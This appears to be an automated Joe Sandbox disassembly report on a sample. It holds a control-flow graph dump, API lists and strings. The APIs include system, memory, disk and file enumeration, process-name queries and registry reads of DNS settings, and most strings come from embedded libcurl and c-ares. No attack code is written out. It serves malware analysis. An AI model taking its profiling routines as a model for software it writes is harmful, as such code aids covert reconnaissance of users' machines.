64442->64445 64442->64448 64443->64448 64454 ec50a0 localeconv localeconv 64443->64454 64445->64448 64455 ec50a0 localeconv localeconv 64445->64455 64448->64436 64449->64427 64450->64433 64451->64428 64452->64441 64453->64448 64454->64448 64455->64448 64456 ebb400 64457 ebb40b 64456->64457 64458 ebb425 64456->64458 64461 e87770 64457->64461 64459 ebb421 64462 e87790 64461->64462 64463 e877b6 recv 64461->64463 64462->64463 64465 e87799 64462->64465 64464 e877a3 64463->64464 64471 e877d4 64463->64471 64472 e872a0 localeconv localeconv 64464->64472 64465->64464 64466 e877db 64465->64466 64473 e872a0 localeconv localeconv 64466->64473 
64469 e877ec 64474 e8cb20 localeconv localeconv 64469->64474 64471->64459 64472->64471 64473->64469 64474->64471 64475 ebf100 64477 ebf11f 64475->64477 64502 ebf1b8 64475->64502 64476 ebff1a 64518 ec0c80 localeconv localeconv 64476->64518 64479 ebf2a3 64477->64479 64492 ebf240 64477->64492 64496 ebf603 64477->64496 64477->64502 64510 ec4f40 localeconv localeconv 64479->64510 64481 ec0045 64483 ec010d 64481->64483 64488 ec004d 64481->64488 64481->64502 64521 ec50a0 localeconv localeconv 64481->64521 64482 ebf80d 64486 ec015e 64483->64486 64522 ec50a0 localeconv localeconv 64483->64522 64485 ec008a 64520 ec4f40 localeconv localeconv 64485->64520 64486->64488 64523 ec50a0 localeconv localeconv 64486->64523 64524 ec4f40 localeconv localeconv 64488->64524 64492->64502 64511 e87310 localeconv localeconv 64492->64511 64495 ebf491 64495->64496 64513 e87310 localeconv localeconv 64495->64513 64496->64476 64496->64481 64496->64482 64496->64485 64499 ec0d30 localeconv localeconv 64496->64499 64508 ec50a0 localeconv localeconv 64496->64508 64516 e8fa50 localeconv localeconv 64496->64516 64517 ec4fd0 localeconv localeconv 64496->64517 64497 ebff5b 64497->64502 64519 ec50a0 localeconv localeconv 64497->64519 64499->64496 64503 ebf3ce 64503->64495 64503->64502 64512 ec50a0 localeconv localeconv 64503->64512 64505 ebf5b9 64515 e8fa50 localeconv localeconv 64505->64515 64507 ebf50d 64507->64502 64507->64505 64514 ec50a0 localeconv localeconv 64507->64514 64508->64496 64510->64502 64511->64503 64512->64495 64513->64507 64514->64505 64515->64496 64516->64496 64517->64496 64518->64497 64519->64502 64520->64502 64521->64483 64522->64486 64523->64488 64524->64502 64525 ec0700 64533 ec0719 64525->64533 64539 ec099d 64525->64539 64528 ec09f6 64536 e875a0 2 API calls 64528->64536 64530 ec09b5 64530->64539 64550 ec50a0 localeconv localeconv 64530->64550 64532 ec0a35 64551 ec4f40 localeconv localeconv 64532->64551 64533->64528 64533->64530 64533->64532 64533->64539 64543 e87310 localeconv 
localeconv 64533->64543 64544 ebb8e0 localeconv localeconv 64533->64544 64545 eef570 localeconv localeconv 64533->64545 64546 eaeb30 localeconv localeconv 64533->64546 64547 ee13a0 localeconv localeconv 64533->64547 64548 f039a0 localeconv localeconv 64533->64548 64549 eaeae0 localeconv localeconv 64533->64549 64540 ec0a11 64536->64540 64541 e875a0 2 API calls 64540->64541 64541->64539 64543->64533 64544->64533 64545->64533 64546->64533 64547->64533 64548->64533 64549->64533 64550->64539 64551->64539 64137 e91139 64151 ebbaa0 64137->64151 64139 e91148 64140 e91512 64139->64140 64141 e91161 64139->64141 64146 e90f00 64140->64146 64159 e922d0 localeconv localeconv 64140->64159 64141->64146 64155 e90150 64141->64155 64142 e90150 localeconv localeconv 64142->64146 64146->64142 64147 e90f7b 64146->64147 64150 e875a0 localeconv localeconv 64146->64150 64160 ebd4d0 localeconv localeconv 64146->64160 64161 e94940 localeconv localeconv 64146->64161 64162 e93900 localeconv localeconv 64146->64162 64150->64146 64152 ebbb60 64151->64152 64153 ebbac7 64151->64153 64152->64139 64153->64152 64163 ea05b0 localeconv localeconv 64153->64163 64157 e90167 64155->64157 64156 e901c3 64156->64146 64157->64156 64164 e930d0 localeconv localeconv 64157->64164 64159->64146 64160->64146 64161->64146 64162->64146 64163->64152 64164->64156 64165 f34720 64169 f34728 64165->64169 64166 f34733 64168 f34774 64169->64166 64176 f3476c 64169->64176 64177 f35540 closesocket 64169->64177 64171 f3482e 64171->64176 64178 f39270 64171->64178 64173 f34860 64183 f34950 64173->64183 64175 f34878 64176->64175 64189 f330a0 closesocket 64176->64189 64177->64171 64190 f3a440 64178->64190 64180 f392ab 64180->64173 64181 f39297 64181->64180 64221 f3bbe0 closesocket 64181->64221 64185 f34966 64183->64185 64184 f349b9 64186 f34aa0 gethostname 64184->64186 64188 f349c5 64184->64188 64185->64184 64185->64188 64222 f3bbe0 closesocket 64185->64222 64186->64184 64186->64188 64188->64176 64189->64168 64218 f3a46b 
64190->64218 64191 f3aa03 RegOpenKeyExA 64192 f3ab70 RegOpenKeyExA 64191->64192 64193 f3aa27 RegQueryValueExA 64191->64193 64196 f3ac34 RegOpenKeyExA 64192->64196 64213 f3ab90 64192->64213 64194 f3aa71 64193->64194 64195 f3aacc RegQueryValueExA 64193->64195 64194->64195 64202 f3aa85 RegQueryValueExA 64194->64202 64198 f3ab66 RegCloseKey 64195->64198 64199 f3ab0e 64195->64199 64197 f3acf8 RegOpenKeyExA 64196->64197 64215 f3ac54 64196->64215 64200 f3ad56 RegEnumKeyExA 64197->64200 64204 f3ad14 64197->64204 64198->64192 64199->64198 64203 f3ab1e RegQueryValueExA 64199->64203 64201 f3ad9b 64200->64201 64200->64204 64205 f3ae16 RegOpenKeyExA 64201->64205 64206 f3aab3 64202->64206 64209 f3ab4c 64203->64209 64204->64181 64207 f3ae34 RegQueryValueExA 64205->64207 64208 f3addf RegEnumKeyExA 64205->64208 64206->64195 64210 f3af43 RegQueryValueExA 64207->64210 64217 f3adaa 64207->64217 64208->64204 64208->64205 64209->64198 64211 f3b052 RegQueryValueExA 64210->64211 64210->64217 64212 f3adc7 RegCloseKey 64211->64212 64211->64217 64212->64208 64213->64196 64214 f3afa0 RegQueryValueExA 64214->64217 64215->64197 64216 f3a4db 64216->64191 64216->64204 64217->64210 64217->64211 64217->64212 64217->64214 64218->64216 64219 f3d190 localeconv localeconv 64218->64219 64220 f3b180 localeconv localeconv 64218->64220 64219->64218 64220->64218 64221->64180 64222->64184 64552 f4b180 64553 f4b19b 64552->64553 64559 f4b2e3 64552->64559 64556 f4b2a9 getsockname 64553->64556 64558 f4b020 closesocket 64553->64558 64553->64559 64560 f4af30 64553->64560 64564 f4b060 64553->64564 64569 f4b020 64556->64569 64558->64553 64561 f4af63 socket 64560->64561 64562 f4af4c 64560->64562 64561->64553 64562->64561 64563 f4af52 64562->64563 64563->64553 64568 f4b080 64564->64568 64565 f4b0b0 connect 64566 f4b0bf WSAGetLastError 64565->64566 64567 f4b0ea 64566->64567 64566->64568 64567->64553 64568->64565 64568->64566 64568->64567 64570 f4b052 64569->64570 64571 f4b029 64569->64571 64570->64553 64572 f4b04b 
closesocket 64571->64572 64573 f4b03e 64571->64573 64572->64570 64573->64553 64574 f4a080 64577 f49740 64574->64577 64576 f4a09b 64578 f49780 64577->64578 64583 f4975d 64577->64583 64579 f49925 RegOpenKeyExA 64578->64579 64578->64583 64580 f4995a RegQueryValueExA 64579->64580 64584 f49812 64579->64584 64581 f49986 RegCloseKey 64580->64581 64581->64583 64583->64584 64585 f3d190 localeconv localeconv 64583->64585 64584->64576 64585->64583 64586 e8255d 64587 1209f70 64586->64587 64588 e8256c GetSystemInfo 64587->64588 64589 e82589 64588->64589 64590 e825a0 GlobalMemoryStatusEx 64589->64590 64595 e825ec 64590->64595 64591 e8263c GetDriveTypeA 64593 e82655 GetDiskFreeSpaceExA 64591->64593 64591->64595 64592 e82762 64594 e827d6 KiUserCallbackDispatcher 64592->64594 64593->64595 64596 e827f8 64594->64596 64595->64591 64595->64592 64597 e828d9 FindFirstFileW 64596->64597 64598 e82906 FindNextFileW 64597->64598 64599 e82928 64597->64599 64598->64598 64598->64599 64600 e83d5e 64603 e83d30 64600->64603 64602 e83d90 64603->64600 64603->64602 64604 e90ab0 64603->64604 64607 e905b0 64604->64607 64610 e907c7 64607->64610 64614 e905bd 64607->64614 64610->64603 64613 e9066a 64618 e906f0 64613->64618 64620 e907ce 64613->64620 64626 e973b0 localeconv localeconv 64613->64626 64614->64610 64614->64613 64614->64620 64624 e903c0 localeconv localeconv 64614->64624 64625 e97450 localeconv localeconv 64614->64625 64615 e90707 WSAEventSelect 64615->64618 64615->64620 64616 e907ef 64617 e96fa0 4 API calls 64616->64617 64616->64620 64623 e90847 64616->64623 64617->64623 64618->64615 64618->64616 64619 e876a0 3 API calls 64618->64619 64619->64618 64627 e97380 localeconv localeconv 64620->64627 64621 e909e8 WSAEnumNetworkEvents 64622 e909d0 WSAEventSelect 64621->64622 64621->64623 64622->64621 64622->64623 64623->64620 64623->64621 64623->64622 64624->64614 64625->64614 64626->64613 64627->64610 64223 e829ff FindFirstFileA 64224 e82a31 64223->64224 64225 e82a5c RegOpenKeyExA 64224->64225 64226 
e82a93 64225->64226 64227 e82ade CharUpperA 64226->64227 64229 e82b0a 64227->64229 64228 e82bf9 QueryFullProcessImageNameA 64230 e82c3b CloseHandle 64228->64230 64229->64228 64232 e82c64 64230->64232 64231 e82df1 CloseHandle 64233 e82e23 64231->64233 64232->64231 64234 e8f7b0 64235 e8f97a 64234->64235 64238 e8f7c3 64234->64238 64236 e90150 2 API calls 64241 e8f854 64236->64241 64238->64235 64238->64236 64239 e8f942 64240 e8f987 64239->64240 64266 ed1390 localeconv localeconv 64239->64266 64267 ed1390 localeconv localeconv 64240->64267 64241->64235 64254 ebcd80 64241->64254 64244 e8f98d 64268 ed1390 localeconv localeconv 64244->64268 64246 e8f9a0 64269 ed1390 localeconv localeconv 64246->64269 64248 e8f9ac 64270 e875a0 64248->64270 64251 e875a0 2 API calls 64252 e8fa12 64251->64252 64253 e875a0 2 API calls 64252->64253 64253->64235 64255 ebd0f1 64254->64255 64262 ebcd9a 64254->64262 64255->64239 64256 ebd0e5 64286 ed1390 localeconv localeconv 64256->64286 64259 ebd016 64285 e9f6c0 7 API calls 64259->64285 64261 ebd018 64284 e97380 localeconv localeconv 64261->64284 64262->64256 64262->64259 64262->64261 64274 ebe130 closesocket localeconv localeconv 64262->64274 64275 e96fa0 64262->64275 64283 e97380 localeconv localeconv 64262->64283 64266->64239 64267->64244 64268->64246 64269->64248 64271 e875aa 64270->64271 64272 e875d1 64270->64272 64271->64272 64287 e872a0 localeconv localeconv 64271->64287 64272->64251 64274->64262 64276 e96feb 64275->64276 64277 e96fd4 64275->64277 64276->64262 64277->64276 64278 e97207 select 64277->64278 64278->64276 64282 e97233 64278->64282 64279 e9726b __WSAFDIsSet 64280 e9729a __WSAFDIsSet 64279->64280 64279->64282 64281 e972ba __WSAFDIsSet 64280->64281 64280->64282 64281->64282 64282->64276 64282->64279 64282->64280 64282->64281 64283->64262 64284->64259 64285->64256 64286->64255 64287->64272 64288 eb95b0 64289 eb95c8 64288->64289 64291 eb95fd 64288->64291 64289->64291 64292 eba150 64289->64292 64293 eba15f 64292->64293 64301 eba246 
64292->64301 64294 eba181 getsockname 64293->64294 64293->64301 64295 eba1f7 64294->64295 64297 eba1d0 64294->64297 64305 ebef30 64295->64305 64304 e9d090 localeconv localeconv 64297->64304 64299 eba1eb 64310 ec4f40 localeconv localeconv 64299->64310 64301->64291 64302 eba20f 64302->64301 64309 e9d090 localeconv localeconv 64302->64309 64304->64299 64306 ebefa8 64305->64306 64308 ebef47 64305->64308 64306->64308 64311 e8c960 localeconv localeconv 64306->64311 64308->64302 64309->64299 64310->64301 64311->64308 64628 eb8b50 64629 eb8b6b 64628->64629 64630 eb8be6 64628->64630 64629->64630 64631 eb8b8f 64629->64631 64632 eb8bf3 64629->64632 64718 e96e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 64631->64718 64661 eba550 64632->64661 64636 eb8ba1 64637 eb8cd9 SleepEx 64636->64637 64649 eb8bb5 64636->64649 64659 eb8cb2 64636->64659 64643 eb8d13 64637->64643 64638 eba150 3 API calls 64647 eb8dff 64638->64647 64639 eb8c1f connect 64640 eb8c35 64639->64640 64646 eba150 3 API calls 64640->64646 64641 eb8e85 64641->64630 64645 eb8eae 64641->64645 64724 e92a00 localeconv localeconv 64641->64724 64648 eb8d43 64643->64648 64643->64659 64645->64630 64725 e878b0 closesocket 64645->64725 64657 eb8c4d 64646->64657 64647->64641 64722 e9d090 localeconv localeconv 64647->64722 64654 eba150 3 API calls 64648->64654 64649->64630 64720 ec50a0 localeconv localeconv 64649->64720 64650 eb8c8b 64650->64636 64653 eb8dc8 64650->64653 64721 ebb100 localeconv localeconv 64653->64721 64654->64649 64655 eb8e67 64723 ec4fd0 localeconv localeconv 64655->64723 64657->64650 64719 ec50a0 localeconv localeconv 64657->64719 64659->64630 64659->64638 64659->64641 64662 eba575 64661->64662 64664 eba597 64662->64664 64729 e875e0 64662->64729 64665 ebef30 2 API calls 64664->64665 64709 eba6d9 64664->64709 64667 eba63a 64665->64667 64666 eba709 64668 e878b0 3 API calls 64666->64668 64675 eba713 64666->64675 64673 eba641 64667->64673 64677 eba69b 64667->64677 64668->64675 64669 eb8bfc 64669->64630 
                                  Strings
                                  Memory Dump Source
• Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 27f0b6ca557cec22aea8267792227a0629519669bc5b6f8c1ba433c798025b43
                                  • Instruction ID: 939c5200141cf64bdb30a945c06d0cbdb4f372238e472722a5f3ed0ffbc17abc
                                  • Opcode Fuzzy Hash: 27f0b6ca557cec22aea8267792227a0629519669bc5b6f8c1ba433c798025b43
                                  • Instruction Fuzzy Hash: CDC2C131A043459FD714CF29C980BABB7E1BF84318F05966DEC98AB262D771ED85CB81

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00E82579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00E825CC
                                  • GetDriveTypeA.KERNELBASE ref: 00E82647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 00E8267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 00E827E2
                                  • FindFirstFileW.KERNELBASE ref: 00E828F8
                                  • FindNextFileW.KERNELBASE ref: 00E8291F
                                  Strings
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                  • String ID: ;%$@$`
                                  • API String ID: 3271271169-3130814153
                                  • Opcode ID: 1ac1dbda903e1ad5aa06420a2dad17deb73742506667434efb4353e3ccf703f7
                                  • Instruction ID: e35e44d7b6453e2462808522644dcb0d9e26e5ccf139fd2bfffd70c993ec3543
                                  • Opcode Fuzzy Hash: 1ac1dbda903e1ad5aa06420a2dad17deb73742506667434efb4353e3ccf703f7
                                  • Instruction Fuzzy Hash: 2AD1B5B49057199FCB10EFA8C59469EBBF0BF48348F01896DE898D7341E7749A84CF92

                                  Control-flow Graph
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 3872892c3504e6750cc44f7872ad4ed2e03b16a12fe69080642a1e022da89a79
                                  • Instruction ID: e9cd2d65744421022513c7cc3b30f3b99d3bb8f20897a900b8a931657164633f
                                  • Opcode Fuzzy Hash: 3872892c3504e6750cc44f7872ad4ed2e03b16a12fe69080642a1e022da89a79
                                  • Instruction Fuzzy Hash: E3E1D7B99057059FCB10EF68D98469EBBF4BF48308F40896DE998DB344E7749988CF42

                                  Control-flow Graph
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00E90711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E909DD
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E909FC
                                  Strings
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=$multi.c
                                  • API String ID: 2170980988-1544942961
                                  • Opcode ID: be0bdef1a710286ac691153f47b568a5cb5a8e25a4196d3f22038863eb8a021a
                                  • Instruction ID: 3a2f04ad03dc8b5bb1c0ecb9a4c6e3ba58418141dc30a33d3a8ab09e86b99eb2
                                  • Opcode Fuzzy Hash: be0bdef1a710286ac691153f47b568a5cb5a8e25a4196d3f22038863eb8a021a
                                  • Instruction Fuzzy Hash: CCD1F3716083019FEB11DF64C881BABB7E5FF84358F44582DF898A7252E774E948CB92

                                  Control-flow Graph
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ccf081aedaf815e83ffd209d596cd967ffc5c9a97d8a8cb25783b4859b857a5
                                  • Instruction ID: 2534ed934ee7b22ab324a7e7ac0d9f414a3c00dc2ae9c4c7f7386b5324e452a5
                                  • Opcode Fuzzy Hash: 0ccf081aedaf815e83ffd209d596cd967ffc5c9a97d8a8cb25783b4859b857a5
                                  • Instruction Fuzzy Hash: EE91033062D3498BDB358B2988907FBB2D5EFC4368F14AB2CE8D8531D4EB749C48D681

                                  Control-flow Graph
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 00F4B2B7
                                  Strings
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 957e659f0a43300b63513fab746585699a070fad2c74557a5853f86892c30eb3
                                  • Instruction ID: 0f60fec6584a553dbcd695afe54d01f7d5daced0d59dd468eb4c7f3a78cd92a0
                                  • Opcode Fuzzy Hash: 957e659f0a43300b63513fab746585699a070fad2c74557a5853f86892c30eb3
                                  • Instruction Fuzzy Hash: CEC17E71A043159FD718DF24C880A6ABBE1FF88314F09896CEC498B3A6D735ED45EB81
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00F3712E,?,?,?,00001001,00000000), ref: 00F4A90C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: c9d0f38a85fc87415b343313e8f7d2e8662429488f5481cb738b43ba9370fbce
                                  • Instruction ID: ce68de8ad467cf3b130506f1d574dbd797b8f41a934c10558f0a96f1121f266c
                                  • Opcode Fuzzy Hash: c9d0f38a85fc87415b343313e8f7d2e8662429488f5481cb738b43ba9370fbce
                                  • Instruction Fuzzy Hash: 76F06D76208308AFD2209E01DC44DBBBBEDEFC9764F05856DFD48232118270AE10DAB2
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F3AA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F3AA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00F3AA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F3AAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F3AB30
                                  • RegCloseKey.KERNELBASE(?), ref: 00F3AB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00F3AB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00F3AC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00F3AD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 00F3AD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 00F3ADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 00F3AE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00F3AE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F3AE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F3AF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F3AFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00F3B072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: 471ba5317456e87a715caac2e49058208858779770cad07c3c047a2dd769704d
                                  • Instruction ID: e4a1e444e8ad4b85e406fa46bc2f970d1547fbb02d2609e16ad54bdaa3d1519b
                                  • Opcode Fuzzy Hash: 471ba5317456e87a715caac2e49058208858779770cad07c3c047a2dd769704d
                                  • Instruction Fuzzy Hash: 7C72C0B1A04301AFE320DF25CC82B6B77E8AF95720F145828F985DB2A1E775E944DB53
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00EBA832
                                  Strings
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 00EBA796
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 00EBAE1F
                                  • Local port: %hu, xrefs: 00EBAF28
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00EBAD0A
                                  • bind failed with errno %d: %s, xrefs: 00EBB080
                                  • Trying %s:%d..., xrefs: 00EBA7C2, 00EBA7DE
                                  • Could not set TCP_NODELAY: %s, xrefs: 00EBA871
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00EBA6CE
                                  • Bind to local port %d failed, trying next, xrefs: 00EBAFE5
                                  • Local Interface %s is ip %s using address family %i, xrefs: 00EBAE60
                                  • cf-socket.c, xrefs: 00EBA5CD, 00EBA735
                                  • @, xrefs: 00EBA8F4
                                  • Trying [%s]:%d..., xrefs: 00EBA689
                                  • @, xrefs: 00EBAC42
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00EBADAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: setsockopt
